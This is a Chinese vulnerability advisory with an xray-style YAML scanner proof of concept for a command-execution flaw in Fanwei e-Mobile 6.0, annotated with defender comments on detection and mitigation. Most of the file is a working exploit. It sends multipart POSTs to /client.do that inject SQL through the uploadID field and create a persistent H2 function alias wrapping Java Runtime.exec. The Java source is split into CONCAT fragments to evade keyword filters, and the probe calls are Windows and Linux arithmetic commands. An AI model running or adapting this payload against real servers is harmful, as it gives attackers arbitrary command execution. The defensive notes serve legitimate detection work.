漏洞描述
泛微 e-Mobile 6.0 存在命令执行漏洞,攻击者可通过在输入中添加特殊字符或命令来欺骗应用程序,使其将这些内容作为有效命令执行,从而获取服务器上的命令执行权限。
HUNTER: app.name="泛微 e-mobile OA"
# Scanner PoC template (set/rules/CEL-expression layout, xray-style YAML — TODO confirm the target engine).
# Defender notes: the request shape below — POST /client.do, multipart field method=getupload,
# SQL injected through the uploadID field — is what a WAF/IDS signature or web-log hunt should key on.
id: e-mobile-6.0-client-rce
info:
name: 泛微 e-Mobile 6.0 命令执行
author: TryA9ain
severity: high
verified: true
description: |
泛微 e-Mobile 6.0 存在命令执行漏洞,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
HUNTER: app.name="泛微 e-mobile OA"
reference:
- https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw
tags: e-Mobile,fanwei
created: 2023/08/22
# rboundary is regenerated on every run, so the multipart boundary is not a stable indicator;
# match on the form-field names and the SQL fragments instead.
set:
rboundary: randomLowercase(8)
rules:
# r0: Windows probe. The uploadID value closes the quoted SQL literal ("1';") and appends
# CREATE ALIAS ... AS '<Java source>', which is H2 database syntax for a Java-backed function —
# this both indicates an H2 back end and shows uploadID is concatenated into SQL unparameterised.
# The Java source is split into CONCAT(...) fragments so a keyword filter on the API names never
# sees a contiguous token; detection should look for CREATE ALIAS / CONCAT( in this field rather
# than for the Java method names.
# The alias is created with "if not exists" and is never dropped, so a scanned instance keeps a
# function alias named MzSNqKsZTagmf in its H2 schema — a persistent forensic artifact to check for.
r0:
request:
method: POST
path: /client.do
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"method\"\r\n\
\r\n\
getupload\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"uploadID\"\r\n\
\r\n\
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagmf('cmd.exe /c set /a 41372*43219');--\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
# Verification: the response body is expected to echo the arithmetic result (41372*43219) written
# back from the spawned process, so a 200 alone does not count as a hit.
expression: response.status == 200 && response.body.bcontains(bytes(string(41372 * 43219)))
# r1: same injection and same alias, Linux probe (expr); only the CALL argument differs from r0.
r1:
request:
method: POST
path: /client.do
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"method\"\r\n\
\r\n\
getupload\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"uploadID\"\r\n\
\r\n\
1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagmf('expr 41358 \\* 43421');--\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(bytes(string(41358 * 43421)))
# Either probe succeeding marks the target as vulnerable. Mitigation suggested by the request shape:
# bind uploadID as a query parameter instead of concatenating it, and, where the deployment allows,
# deny CREATE ALIAS / Java-backed functions to the H2 account the application uses.
expression: r0() || r1()